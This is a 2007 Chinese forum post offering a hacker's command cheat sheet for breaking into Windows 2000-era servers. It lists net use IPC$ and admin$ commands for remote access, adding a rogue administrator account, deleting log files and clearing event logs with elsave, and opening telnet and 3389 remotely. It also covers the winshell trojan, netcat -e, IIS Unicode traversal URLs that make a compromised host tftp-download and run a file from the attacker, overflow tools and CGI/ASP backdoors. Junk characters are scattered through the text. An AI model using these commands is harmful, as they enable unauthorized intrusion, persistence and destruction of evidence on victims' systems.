找回密码
 入住遨海湾
搜索
网站解决方案专享优惠-3折上云
查看: 728|回复: 0

网管和黑客都必须知道的命令

[复制链接]
发表于 2007-12-22 22:40:00 | 显示全部楼层 |阅读模式

登录后查才能浏览下载更多咨询,有问题联系QQ:3283999

您需要 登录 才可以下载或查看,没有账号?入住遨海湾

×
  与远程主机建立空管连接 net use \IP地址ipc$ "" /use:"" : Z' L' e$ M3 |$ b0 U: J  以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator" 1 e2 M- \% R. g2 U$ p, G  传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$ , P ]& N, x! T) t- B  查看远程主机时间 net time \IP地址 ; X p! c! _# x2 y  定时启动某个程序 at \IP地址 02:18 readme.exe $ Q ^' _, A) k) Y8 p7 _  查看共享 net view \IP地址 4 d& H6 ~) n' \ F+ O0 C8 F  查看netbios工作组列表 nBTstat -A IP地址 7 o5 Y2 L1 e" O0 T   将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator" & {; r4 e8 e" `  这两条把自己增加到管理员组: net user 用户名 密码 /add $ a* _, |( b L' e8 }7 B   net locaLGroup Administrators 用户名 /add - A% m: F; H4 b, d  断开连接 net use \IP地址ipc$ /delete + ?+ G- O) h$ q3 K+ j" P* ^* s, ?# X* q a   扫尾: % [2 l& n3 S( |( B0 R+ ?) {  del C:winntsystem32logfiles*.* - p6 [5 e& v0 I9 {; j   del C:winntssytem32config*.evt $ l4 ^: q7 c$ H0 D4 W& z  del C:winntsystem32dTCLog*.* 2 H4 g/ X/ l% O' p3 R: [   del C:winntsystem32*.log * m2 N1 T& O' Y- K! X  del C:winntsystem32*.txt / @2 T$ X8 r+ e2 n$ G$ s3 a   del C:winnt*.txt 7 O# \8 u! J0 {3 C! E& \2 Z# T  del C:winnt*.log " g2 D3 g- q2 S8 I4 g ! X9 l. _7 x7 H$ ^& e8 y8 Q一、netsvc.exe 1 g$ s0 z4 ?* d+ Q   下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: 1 L1 ?% P- S+ a& n6 r3 K, E6 W   netsvc /list \IP地址 ) T8 w# s! L! M7 K   netsvc schedule \IP地址 /query ) b3 s: Z! S9 R   netsvc \IP地址 schedule /start % }0 M6 X8 i3 v $ n2 z& t6 ^8 x二、OpenTelnet.exe : o' {5 \( ?& ~3 p4 `( ]% J X   远程启动主机的Telnet服务,并绑定端口到7878,例如: ! ?. E6 |! l: j, E( T" T   OpenTelnet \IP地址 用户名 密码 1 7878 2 }. W6 J, @7 @- |   然后就可以telnet到主机的7878端口,进入DOS方式下: 7 w5 A3 i: ]9 t# o  telnet IP地址 7878 ( h; i' v+ I+ l4 E9 g$ S3 p1 P$ K 9 w6 Y A! J/ u$ x: U, b 三、winshell.exe 6 m8 L3 P- @0 n9 d$ w& ?  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: 9 b; O$ R4 o3 I" n, X; ^  p Path (查看winshell主程序的路径信息) " R! z8 J0 P! N1 H$ @  b reBoot (重新启动机器) # @6 P4 }5 i3 L) G8 _! n3 Z% j   d shutDown (关闭机器) " a7 q; \ _% x! b7 R4 k" m' l  s Shell (执行后你就会看到可爱的“C:>”) . k/ D+ e, C v( L   x eXit (退出本次登录会话,此命令并不终止winshell的运行) 3 Z. B' w* ]* g! z/ S+ \   CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) % `( _1 b0 m1 `2 Q0 o3 Z& l* X 8 t Y/ Z1 ]3 F: G* m( d) K 四、3389登陆器,GUI方式登录远程主机的 ; F: b9 G' K2 `; D6 v' W' y 9 P& y# s% M7 I7 ^ y五、elsave.exe 9 N% ~5 y/ L9 z& m, u* l0 T2 @4 R  事件日志清除工具 5 ]- R- M2 n% M( ]   elsave -s \IP地址 -l "application" -C 2 B$ y5 l1 {& F  elsave -s \IP地址 -l "system" -C , Z, [: s- T3 s) `8 h s( r7 w  elsave -s \IP地址 -l "security" -C & u3 c, t" P6 e  执行后成功清除应用程序日志,系统日志,安全日志 - x. i& c% d+ `+ @" `六、hbulot.exe 0 F+ @9 I2 S7 i+ u   开启win2kserver和winxp的3389服务 0 H* _- O. T, L: A) L7 M   hbulot (/r) 2 S4 D0 l( n. U6 U- p/ N6 \/ s 1 H/ a) z5 {2 t# k% N; y/ ]* \七、nc.exe(netcat.exe) 4 i' ]5 e! R7 I  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 8 d' Z# v4 T& U9 t1 A   想要连接到某处: nc (-options) hostname port(s)(ports) ... - y& s" U4 ~! c- `' A6 E; W   绑定端口等待连接: nc -l -p port (-options) (hostname) (port) ' X `6 D8 `& }( k- r % ~0 F9 \) a- g$ h5 b" B, Y4 m5 B参数: : h4 ~& x; R6 E  -e prog 程序重定向,一旦连接,就执行 (危险!) 6 i8 B/ m6 E' Z$ t2 `  -g gateway source-routing hop point(s), up to 8 ( @' P" c- X8 U% x3 y   -G num source-routing pointer: 4, 8, 12, ... ) Z" Y# D0 A/ J+ S" U  -h 帮助信息 ; g8 _* g. K; C) @2 [   -i secs 延时的间隔 ( P" B9 ^2 B# G/ ~2 a F* T8 w/ t  -l 监听模式,用于入站连接 $ I% e# V, y) b: m9 ^   -n 指定数字的IP地址,不能用hostname . A! N# c$ e7 H% G. _  -o file 记录16进制的传输 ; m2 J- \1 x; H" G   -p port 本地端口号 . F6 y" b0 m7 R   -r 任意指定本地及远程端口 5 z. C( q; m/ Q! I: b# T0 r   -s addr 本地源地址 e" Q! z$ k H6 U" m/ R3 [   -u UDP模式 $ Z3 O* D1 x, g9 K" l  -v 详细输出——用两个-v可得到更详细的内容 2 S) F4 F* E* Z/ H. \+ K D# ~, j  -w secs timeout的时间 % h" N/ c% P4 Q! o0 b# ~   -z 将输入输出关掉——用于扫描时 2 j' h6 z- D# k& Y* U 2 I$ Z. p( r( H) o8 }& {( o6 U A八、TFTPD32.EXE $ B) J; E, t: Q0 W  把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: 8 @$ r3 Z6 g! [0 b, p  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 2 _: I6 J8 Z) n# f6 B+ p  然后可以直接令文件运行: 0 l/ t7 g2 J3 V8 D   http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 ) n% Y% m+ a( t4 |7 d9 j. H S" h+ R, l( ?; e% R 九、prihack.exe是IIS的printer远程缓冲区溢出工具 " i: Y* N3 d, g0 Y% E) x& u6 E, f  idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 % z* b+ O) L% _2 i+ ^" o1 m 2 |- E5 [2 s+ s: q8 D: F 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接.
遨海湾-心灵的港湾 www.aosea.com
您需要登录后才可以回帖 登录 | 入住遨海湾

本版积分规则

网站解决方案专享优惠-3折上云

QQ|手机版|小黑屋|遨海湾超级社区

GMT+8, 2025-10-25 03:46

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表